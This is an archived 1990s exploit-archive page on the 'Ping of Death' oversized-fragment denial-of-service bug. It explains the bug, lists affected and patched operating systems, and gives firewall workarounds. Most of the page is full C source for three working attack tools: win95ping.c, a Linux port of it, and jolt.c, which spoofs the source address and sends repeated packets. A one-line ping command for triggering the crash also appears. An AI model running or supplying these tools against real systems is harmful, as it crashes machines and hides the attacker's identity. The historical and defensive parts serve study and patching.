Ping of Death
| Description: | gazillions of machines can be crashed by sending IP packets that exceed the maximum legal length (65535 octets) |
| Author: | The page included was created by Malachi Kenney. The programs have attribution. |
| Compromise: | Stupid DOS |
| Vulnerable Systems: | I have heard that NT and 95 can actually lock up hard from the programs below. Also, early 2.0.x Linux, Solaris x86, and Macintosh systems are often vulnerable. |
| Date: | 21 October 1996 was when this page came up. |
| Notes: | The Ping O' Death page is included first, then comes BSD source code, then comes a version of the above which is modified to compile on Linux 2.X. I also appended jolt.c, which IP spoofs to. Woop! |
It's the Ping o' Death Page!
How to crash your operating system!
Maintained by Malachi Kenney, last updated 1/22/97, 1800 GMT
Please mail me with any updates, corrections or new information, being sure to include the word "ping" in the subject line.
[ From: http://www.sophist.demon.co.uk/ping ]
List of mirror sites
The Ping o'Death diary - new information in the order it's received
The primary site moved to http://prospect.epresence.com/ping/ on 1/22/97. Great thanks to Mike Bremford, who started this site and
maintained it through the the period of constant updating.
Javier Romeu of RED Security has done a brilliant job of translating all the pages to Spanish (I have enough trouble maintaining them in
English...). They're available here.
1. The Problem
In a nutshell, it is possible to crash, reboot or otherwise kill a large number of systems by sending a ping of a certain size from a
remote machine. This is a serious problem, mainly because this can be reproduced very easily, and from a remote machine. (During tests, my
machine in London, England has been crashed from a machine in Berkeley, California), and because the attacker needs to know nothing about
the machine other than its IP address. Be afraid. Since I started this page on the 21st October, over 18 major operating systems have
been found vulnerable.
It's very easy to exploit - basically, some systems don't like being pinged with a packet greater than 65536 bytes (as opposed to the
default 64 bytes). This bug is not limited to Unix, but is popping up on Macs, Netware, Printers, Routers... the list goes on. Patches are
coming out extremely fast - the award did go to the Linux community for getting a patch out within three hours (well, 2 hours 35 minutes 10
seconds if you must know), but Bill Webb from Telebit assures me that the Netblazer patch was out within two! OK, OK, you can share the
prize money... :-)
An IP datagram of 65536 bytes is illegal, but possible to create owing to the way the packet is fragmented (broken into chunks for
transmission). When the fragments are reassembled at the other end into a complete packet, it overflows the buffer on some systems, causing
(variously) a reboot, panic, hang, and sometimes even having no effect at all...
Most implementations of ping won't allow an invalid datagram like this to be sent. Among the exceptions are Windows '95 and NT, although
they are certainly not the only ones...
1.1 A far better explanation of the problem
Thanks to Paul Gortmaker we now have a decent explanation of why this is happening
Background Information on ICMP ECHO ("ping"):
IP packets as per RFC-791 can be up to 65,535 (2^16-1) octets long, which includes the header length (typically 20 octets if no IP options
are specified). Packets that are bigger than the maximum size the underlyling layer can handle (the MTU) are fragmented into smaller
packets, which are then reassembled by the receiver. For ethernet style devices, the MTU is typically 1500.
An ICMP ECHO request "lives" inside the IP packet, consisting of eight octets of ICMP header information (RFC-792) followed by the number
of data octets in the "ping" request. Hence the maximum allowable size of the data area is 65535 - 20 - 8 = 65507 octets.
What causes my machine to crash from this?
Note that it is possible to send an illegal echo packet with more than 65507 octets of data due to the way the fragmentation is performed.
The fragmentation relies on an offset value in each fragment to determine where the individual fragment goes upon reassembly. Thus on the
last fragment, it is possible to combine a valid offset with a suitable fragment size such that (offset + size) > 65535. Since typical
machines don't process the packet until they have all fragments and have tried to reassemble it, there is the possibility for overflow of
16 bit internal variables, which can lead to system crashes, reboots, kernel dumps and the like.
1.2 Another twist...
With all this talk of ping, it's easy to miss the root of the problem. Joel Maslak has pointed out that this exploit is by no means
restricted to ping. The problem can be exploited by anything that sends an IP datagram - probably the most fundamental building block of
the net. Not only ICMP echo, but TCP, UDP and (apparently) even new style IPX can be used to hit machines where it hurts.
Bottom line is that blocking ping at the firewall is a temporary fix only. The only solution is to secure the kernel against overflow when
reconstructing IP fragments. (To the best of my knowledge, all of the patches currently available fix the problem). So don't think you're
safe just because you've blocked ping. Damage could be done through NFS, telnet, http... in short, any port your machine listens on is a
target (and maybe even those you don't listen on... anyone?)
2. How to test if you're vulnerable
Unfortunately, this bug is really easy to exploit. Users are already trying it out "just to see if it worked". So, to test if your machine
is in danger, find a Windows '95 or NT box (3.51 or 4), and run the following command:
ping -l 65510 your.host.ip.address
The message on the '95 box will be "Request Timed Out". This means that the ping wasn't answered, either because the machine is ignoring
you (and rightly so if you're going to send it invalid packets), or because it's dead. It's that simple...
Now, courtesy Bill Fenner, those of us without access to '95 or NT can crash machines too - go here for the source code to an evil
implementation of ping.
Apparently, according to Volker Ossenkopf, the ping command on Linux can be rebuilt with a higher package size limit in the ping
source, and used to whack machines too. Remember, Linux Ping must be run as root. Note - I've tried this and can't make it
work... Volker did it with Kernel 1.3.84, so maybe things have changed since then
I've also been given a pointer by Darren Reed to this package, which is "a generic tool for testing the robustness of IP stacks. It
includes tests which try to exploit many different problems." It sounds like it would probably identify this ping problem, plus any
others lurking in your networking code.
If you're having trouble reproducing this, try loading the machine up. Although it's hard to tell, it seems that a nearly idle
machine is more likely to withstand the "Ping O'Death" than one which is busy/swapping/otherwise earning it's living. This is
possibly due to a memory overflow being more likely to hit something important if the machine is busy... also, I've been told the
maximum size packet from Windows '95 is 65527, which is 20 bytes over the legal limit. This may produce more spectacular results than
a 65510 ping.
And as an aside... from Nick Bastin...
Unfortunately, while Irix 6.2 has been patched to keep the 64k ping crash from occuring on its servers, it now has the ability to
send such a ping, even as a flood...apparently this was some kind of retribution from the programmers so that owners of Irix 5.3
could kill the people that killed them...<g>
3. How to prevent people from breaking your system
If no patch is available, and your main concern are pings from users outside your network, it would seem the best quick-fix solution is to
block ping at the firewall. This is not a long-term solution. If you have *any* services listening on any ports at all, they are
vulnerable. Be assured that sooner or later someone will come out with a program which sends invalid packets to a web server, an ftp port.
The only solution is to patch your operating system.
By blocking ping, you prevent people from pinging you at all. This could possibly break some things that rely on ping - I believe that DEC
ObjectBroker uses ping to confirm a connection is still up. Other packages may go too.
A better solution than blocking all pings is to block only fragmented pings. This will allow your common-or-garden 64 byte ping through on
almost all systems, while blocking any bigger than the MTU size of your link. (This varies, but about 1k is a good bet).
Thanks to Alastair Young, we have some information on how to block the evil ping using Firewall-1. Follow this link for details.
4. The affected systems
This is very much a work in progress. Please, any additional information you come by mail me so I can update this page.
Please include the word "ping" in the subject line
4.1. Vulnerable operating systems without patches
This includes systems which I haved mixed reports on
Operating system
Version
Symptoms
Comments
Solaris (x86)
2.4
Reboot
Patches are available for 2.5 and 2.5.1, but there are no
patches for 2.4.
Minix
1.7.4, v2.0 and
probably others
Crash
No fix yet
HP3000 MPE/iX
4.0, 5.0, 5.5
System abort
The exact message was "System abort 3890 from subsys
201".
Convex SPP-UX
All versions
Crash
No fix yet, but Convex are working on a patch.
AOS
?
?
This is suspected to be vulnerable, based on its BSD 4.3
heritage. However, only one person has been able to crash
it yet, using a 32768 byte packet
KA9Q OS
?
Crash
No fix yet
NEXTSTEP
various
Platform
dependant
Next have tested this, follow the link for more info. The
vulnerability is to a 32768 byte packet
Apple Mac
MacOs 7.x.x
Crash
See the Mac page for details
Windows 3.11 with Trumpet Winsock
?
Mixed reports
One person has had no problems, another two get network
errors and lose the network connection - the machine had
to be rebooted to restore it
Windows 3.11 with FTP software PCTCP 4.0,
Chameleon NFS 5.4, Digital Pathworks stack
6.0.034 and LINK TCP stack
-
Hangs
No fix...
MSDOS with Lan Workplace
?
Crash
No fix yet
Novell Netware
3.x
Mixed results
Ranging from crash to no effect. 3.11 with TCPIP.NLM
v1.01 hangs the IP stack (IPX/SPX stack is OK), while
3.12 with TCPIP.NLM v2.02 rev 9 is unaffected.
SCO Open Desktop, Internet FastStart, SCO
Unix SysV/386
?
Vulnerable
SCO have found this vulnerable. Again, see the CERT
advisory. The problem is network card dependant - at
least the NE2000 and the SMC range are vulnerable
Windows '95
All of 'em
Crash
Once again, the same problem as NT 3.51 and NT 4.0. '95
can be killed quite effectively by sending a large ping
(not receiving). Try the instructions Microsoft have
given for NT 3.51, and remember, your mileage may vary -
a lot of people have no problems
4.2. Vulnerable operating systems with patches
Operating system
Version
Symptoms
Comments
AIX
3 and 4
Operating system dump.
Patch Available! The patch for 3.2.5 has been around for a
while, so it may already be applied to your system.
Linux
<= 2.0.23
Spontaneous reboot or
kernel panic
Patch available!, and supplied here. Kernel 2.0.24 is out,
which fixes this. Upgrade now!
Linux
1.2.13
Reboot, Hang or No
effect
Patch available!, although this one hasn't been tested.
Supplied here
DEC Unix/OSF1
2.0 and above
Kernel Panic
Patch available! and supplied here
OpenVMS for AXP
various
Mixed reports
Patch really is available!, as of 15th November (so I've
been told). Follow the yellow brick link
OpenVMS for VAX
v6.2, UCX v4.0 and
others
Reboot
It turns out the the one person who managed to crash this was
right... OpenVMS for VAX is vulnerable, as DEC have found
out. I haven't got any information on this, other than that
the vulnerablity is presumably the same as for DEC Ultrix,
and that more information can be gained from the CERT
Advisory or the Ultrix page linked in column one
HP-UX
9.0 to 10.20
Crash, Reboot, Hang...
Patch available!, follow the link... (it works too...).
See also CIAC F-04 for the same information, just officially
Windows NT
3.5.1
Mixed results
The latest word is Microsoft have acknowledged the problem
and have released a patch (it seems that sending a bad ping
can make NT do some funny things!). Some info just in is that
if you do as M*soft says (ping -l 65510 -s 1 ip.address) you
can crash NT 3.51. So maybe it is vulnerable after all.
Galacticomm Worldgroup
BBS/Terminal Server
1.0, 2.0
General Protection
Fault
Yup, this has been fixed too. Patches available for v1 and
v2, with version v3 being ping proof. Follow the ol'
hyperlink for the scoop. Note that this problem only affects
the Galacticomm TCP/IP stack - the Vircom MajorTCP/IP stack
is not vulnerable
MkLinux
?
Crash
There is a guide available on upgrading your kernel to
2.0.27, which will fix the problem
Unisys A series
TCP/IP pre 32.4 release
Crash
Unisys have informed me that this problem is corrected in the
32.4 and higher A series TCP/IP product. I'm assuming that an
upgrade will correct it
Convex OS
All versions
Crash
Patch available! Contact the TAC
Solaris (x86)
2.5, 2.5.1a
-BSD ping program:
*
* win95ping.c
*
* Simulate the evil win95 "ping -l 65510 buggyhost".
* version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum). That means that SunOS, Solaris, and
* BSD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
* system to try it on.
*
* The attack from the Win95 box looks like:
* 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
* 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
* 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
* 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
* 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
* 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
* 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+)
* 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
* 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
* 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
* 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
* 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
* 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
* 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
* 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
* 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
* 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
* 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
* 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
* 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
* 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
* 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
* 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
* 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
* 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
* 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
* 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
* 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
* 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
* 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
* 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
* 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
* 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
* 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
* 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
* 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
* 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
* 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
* 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
* 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
* 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
* 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
* 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
* 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
* 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*
* If your kernel doesn't muck with raw packets, #define REALLY_RAW.
* This is probably only Linux.
*/
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int
main(int argc, char **argv)
{
int s;
char buf[1500];
struct ip *ip = (struct ip *)buf;
struct icmp *icmp = (struct icmp *)(ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = 1;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(1);
}
if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> 3);
if (offset < 65120)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}
--Linux modification:
/*
* win95ping.c
*
* Simulate the evil win95 "ping -l 65510 buggyhost".
* version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
* version 1.01 Mike Bremford <Mike.Bremford@bl.uk> patched for Linux
* version 1.02 Barak Pearlmutter <bap@sloan.salk.edu> clean compile
*
* This requires raw sockets that don't mess with the packet at all (other
* than adding the checksum). That means that SunOS, Solaris, and
* BSD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
* OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
* system to try it on.
*
* The attack from the Win95 box looks like:
* 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
* 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
* 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
* 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
* 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
* 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
* 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+)
* 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
* 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
* 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
* 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
* 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
* 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
* 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
* 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
* 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
* 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
* 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
* 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
* 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
* 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
* 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
* 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
* 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
* 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
* 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
* 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
* 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
* 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
* 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
* 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
* 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
* 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
* 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
* 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
* 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
* 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
* 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
* 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
* 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
* 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
* 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
* 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
* 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
* 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
*
*/
#ifdef LINUX
#define REALLY_RAW
#define __BSD_SOURCE
#ifndef IP_MF
#define IP_MF 0x2000
#define IP_DF 0x4000
#define IP_CE 0x8000
#define IP_OFFSET 0x1FFF
#endif
#endif
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>
/*
* If your kernel doesn't muck with raw packets, #define REALLY_RAW.
* This is probably only Linux.
*/
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int
main(int argc, char **argv)
{
int s;
char buf[1500];
struct ip *ip = (struct ip *)buf;
#ifdef LINUX
struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
#else
struct icmp *icmp = (struct icmp *)(ip + 1);
#endif
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = 1;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW,
#ifdef LINUX
IPPROTO_ICMP
#else
IPPROTO_IP
#endif
)) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(1);
}
if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
exit(1);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
#ifdef LINUX
ip->ip_csum = 0; /* kernel fills in */
#else
ip->ip_sum = 0; /* kernel fills in */
#endif
ip->ip_src.s_addr = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
#ifdef LINUX
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
#else
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
#endif
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> 3);
if (offset < 65120)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
#ifdef LINUX
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
#else
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
#endif
}
}
return 0;
}
--Here is jolt.c:
/* Jolt
1.0 (c) 1997 by Jeff w. Roberson
* Please, if you use my code give me credit. Also, if i
was the first to
* find this glitch, please give me credit. Thats all i
ask.
*
* Ok so all this does is build a really fraggmented over
sized packet
* and once win95 gets it, and puts it back together it
locks. I send
* multiple packets by default cause some times it takes a
few packets to
* totally freeze the host. Maybe its spending processor
time to figure
* out how to put them back together? I've had reports of
people blue
* screening from it tho so we'll let Microsoft's boys
figure out exactly
* what this does to 95. As of now i haven't tested it on
NT, but maybe
* i will later ;). All of this source wasn't origonally
written by me
* I just took one of the old programs to kill POSIX and
SYSV based
* systems and worked on it abit, then made it spoof =).
* VallaH (yaway@hotmail.com)
*
* Update: It apears to work on some older versions of mac
os
*/
/* Yah this is for linux, but i like the BSD ip header
better then linux's */
#define __BSD_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>
int main(int argc, char **argv)
{
int s,i;
char buf[400];
struct ip *ip = (struct ip *)buf;
struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
struct hostent *hp, *hp2;
struct sockaddr_in dst;
int offset;
int on;
int num = 5;
if (argc < 3) {
printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!)
glitch by VallaH (yaway@hotmail.com)\n");
printf("\nusage: %s <dstaddr> <saddr>
[number]\n",argv[0]);
printf("\tdstaddr is the host your
attacking\n");
printf("\tsaddr is the host your spoofing
from\n");
printf("\tNumber is the number of packets to send, 5
is the default\n");
printf("\nNOTE: This is based on a bug that used to
affect POSIX complient, and SYSV \n\t systems so its
nothing new..\n");
printf("\nGreets to Bill Gates! How do ya like this
one? :-)\n");
exit(1);
}
if (argc == 4) num = atoi(argv[3]);
for (i=1;i<=num;i++) {
on=1;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW )) < 0)
{
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on,
sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
exit(1);
}
} else {
bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr,
hp->h_length);
}
if ((hp2 = gethostbyname(argv[2])) == NULL) {
if ((ip->ip_src.s_addr = inet_addr(argv[2])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[2]);
exit(1);
}
} else {
bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr,
hp->h_length);
}
printf("Sending to %s\n",
inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = htons(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = htons(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_csum = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = htons(~(ICMP_ECHO << 8));
for (offset = 0; offset < 65536; offset += (sizeof buf
- sizeof *ip)) {
ip->ip_off = htons(offset >> 3);
if (offset < 65120)
ip->ip_off |= htons(0x2000);
else
ip->ip_len = htons(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr
*)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->type = 0;
icmp->code = 0;
icmp->checksum = 0;
}
}
close(s);
usleep(30000);
}
return 0;
}
}
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
